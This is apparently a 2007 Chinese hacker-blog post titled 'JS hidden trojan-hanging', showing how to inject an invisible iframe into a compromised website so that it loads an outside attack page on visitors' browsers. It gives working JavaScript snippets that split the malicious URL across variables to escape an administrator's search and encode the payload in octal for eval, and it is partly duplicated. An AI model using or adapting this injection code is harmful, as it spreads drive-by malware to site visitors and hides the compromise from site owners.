2007-03-17 13:37:37 by: h4x0r
JS隐蔽挂马
来源:Trace's Blog
1.
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
2.
转换进制,然后用EVAL执行。如
不过这个有点显眼。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=832
1.
var tr4c3="<iframe src=ht";
tr4c3 = tr4c3+"tp:/";
tr4c3 = tr4c3+"/ww";
tr4c3 = tr4c3+"w.tr4";
tr4c3 = tr4c3+"c3.com/inc/m";
tr4c3 = tr4c3+"m.htm style="display:none"></i";
tr4c3 =tr4c3+"frame>'";
document.write(tr4c3);
tr4c3 = tr4c3+"tp:/";
tr4c3 = tr4c3+"/ww";
tr4c3 = tr4c3+"w.tr4";
tr4c3 = tr4c3+"c3.com/inc/m";
tr4c3 = tr4c3+"m.htm style="display:none"></i";
tr4c3 =tr4c3+"frame>'";
document.write(tr4c3);
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
2.
转换进制,然后用EVAL执行。如
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
不过这个有点显眼。
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=832
哇哈哈啊啊啊~~这样地址栏毛都看不到了~